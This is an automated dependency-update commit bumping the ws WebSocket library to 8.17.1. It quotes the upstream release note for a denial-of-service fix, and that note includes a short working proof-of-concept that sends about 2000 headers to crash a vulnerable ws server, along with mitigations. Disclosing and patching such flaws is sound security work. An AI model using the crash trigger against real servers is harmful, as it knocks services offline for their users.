Commit c540af8: Update dependency ws to v8.17.1 (#1080)
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [ws](https://github.com/websockets/ws) | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.17.0/8.17.1) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) |
---
> [!WARNING]
> Some dependencies could not be looked up. Check the Dependency Dashboard for more information.
---
### Release Notes
<details>
<summary>websockets/ws (ws)</summary>
### [`v8.17.1`](https://github.com/websockets/ws/releases/tag/8.17.1)
[Compare Source](https://github.com/websockets/ws/compare/8.17.0...8.17.1)
### Bug fixes
- Fixed a DoS vulnerability ([#2231](https://github.com/websockets/ws/issues/2231)).
  A request with a number of headers exceeding the [`server.maxHeadersCount`][server.maxHeadersCount]
  threshold could be used to crash a ws server.
```js
const http = require('http');
const WebSocket = require('ws');

const server = http.createServer();
const wss = new WebSocket.Server({ server });

server.listen(function () {
  // Build 2000 distinct two-character header names from valid token characters.
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';
      if (++count === 2000) break;
    }
  }

  // The regular WebSocket upgrade headers, added on top of the padding headers.
  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: server.address().port
  });

  request.end();
});
```
The vulnerability was reported by [Ryan LaPointe](https://github.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://github.com/websockets/ws/issues/2230).
In vulnerable versions of ws, the issue can be mitigated in the following ways:
1. Reduce the maximum allowed length of the request headers using the
   [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so
   that no more headers than the `server.maxHeadersCount` limit can be sent.
2. Set `server.maxHeadersCount` to `0` so that no limit is applied.
[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize
[`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener
[`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] If you want to rebase/retry this PR, check this box
---
This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/X-oss-byte/Canary-nextjs).

1 parent 3e03f17, commit c540af8
1 file changed (+1 -1 lines)
Diff (only the line-number skeleton survived extraction): line 292 of the single changed file was replaced (one line removed, one line added); lines 289-291 and 293-295 are unchanged context. The diff text itself is not recoverable from this page.
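Review bot: the diff body itself did not render here; only its skeleton is visible (one file changed, +1/-1, line 292 replaced, lines 289-291 and 293-295 unchanged), so the actual edit cannot be reviewed from this page. Given the commit message, the replaced line should be the ws version bump `8.17.0` -> `8.17.1`; since only one file changed, confirm either that this file is the lockfile or that the lockfile was regenerated in the same change, otherwise installs may keep resolving the vulnerable 8.17.0.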